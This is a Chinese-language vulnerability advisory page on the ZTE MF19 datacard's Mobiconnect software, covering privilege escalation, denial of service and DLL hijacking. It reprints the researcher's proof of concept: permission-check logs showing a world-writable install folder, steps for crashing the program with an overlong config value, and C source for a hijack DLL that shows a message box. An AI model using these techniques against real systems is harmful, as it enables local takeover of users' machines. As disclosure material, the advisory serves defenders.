当前位置: 首页 > 服务与支持 > 产品升级公告 > 安全漏洞公告

服务与支持Support

ZTE Datacard MF19 0V1.0.0B PCW多个安全漏洞

     发表日期:2015-01-19 13:45:17

ZTE Datacard MF19 0V1.0.0B PCW多个安全漏洞
BugTraq-ID:71892
发布日期:2015-01-01
更新日期:2015-01-08
受影响系统:
ZTE MF19 0V1.0.0B
详细信息:

ZTE MF19是一个数据卡设备。

 

ZTE Datacard MF19 0V1.0.0B PCW在实现上存在任意代码执行漏洞、本地权限提升漏洞、本地拒绝服务等多个漏洞,攻击者可利用这些漏洞获取提升的权限、造成受影响设备崩溃等影响。


来源:
hadji samir (s-dz@hotmail.fr)
参考信息:
http://www.securityfocus.com/archive/1/534392

http://www.vulnerability-lab.com/get_content.php?id=1392
测试方法:
警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!--- PoC Session Logs Local Privilege Escalation ---

 

C:\\Users\\s-dz\\Desktop>accesschk.exe -dqv "C:\\Program Files\\Mobiconnect"

C:\\Program Files\\Mobiconnect

Medium Mandatory Level (Default) [No-Write-Up]

RW Tout le monde

FILE_ALL_ACCESS

RW NT SERVICE\\TrustedInstaller

FILE_ALL_ACCESS

RW AUTORITE NT\\SystÃ?me

FILE_ALL_ACCESS

RW BUILTIN\\Administrateurs

FILE_ALL_ACCESS

R BUILTIN\\Utilisateurs

FILE_LIST_DIRECTORY

FILE_READ_ATTRIBUTES

FILE_READ_EA

FILE_TRAVERSE

SYNCHRONIZE

READ_CONTROL

 

C:\\Users\\s-dz\\Desktop>

 

C:\\Program Files>icacls "Mobiconnect"

Mobiconnect Tout le monde:(F)

Tout le monde:(OI)(CI)(IO)(F)

NT SERVICE\\TrustedInstaller:(I)(F)

NT SERVICE\\TrustedInstaller:(I)(CI)(IO)(F)

AUTORITE NT\\Système:(I)(F)

AUTORITE NT\\Système:(I)(OI)(CI)(IO)(F)

BUILTIN\\Administrateurs:(I)(F)

BUILTIN\\Administrateurs:(I)(OI)(CI)(IO)(F)

BUILTIN\\Utilisateurs:(I)(RX)

BUILTIN\\Utilisateurs:(I)(OI)(CI)(IO)(GR,GE)

CREATEUR PROPRIETAIRE:(I)(OI)(CI)(IO)(F)

 

1 fichiers correctement traités ; échec du traitement de 0 fichiers

 

--- PoC Local DoS ---

 

first go to C:\\program files\\Internet Mobile\\networkCfg.xml (Network configuration)

and write "A" * 3000 in <ConfigFileName>"A" x 3000</ConfigFileName> . Save it open the program .

poc will crash ...

 

--- DLL Hijacking Exploit (mms_dll_r.dll, mediaplayerdll.dll) ---

 

*/

 

#include <windows.h>

 

BOOL WINAPI DllMain (

HANDLE hinstDLL,

DWORD fdwReason,

LPVOID lpvReserved)

{

switch (fdwReason)

{

case DLL_PROCESS_ATTACH:

owned();

case DLL_THREAD_ATTACH:

case DLL_THREAD_DETACH:

case DLL_PROCESS_DETACH:

break;

}

return TRUE;

}

 

int owned() {

MessageBox(0, "ZTE DLL Hijacked\\Hadji Samir", "POC", MB_OK);

}
解决办法:
厂商补丁:

ZTE
---
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

 

http://www.zte.com.cn

http://www.mobilis.dz/entreprises/mobiconnect.php

http://www.3g.dz/fr/cle_mas/index.php?id_document=2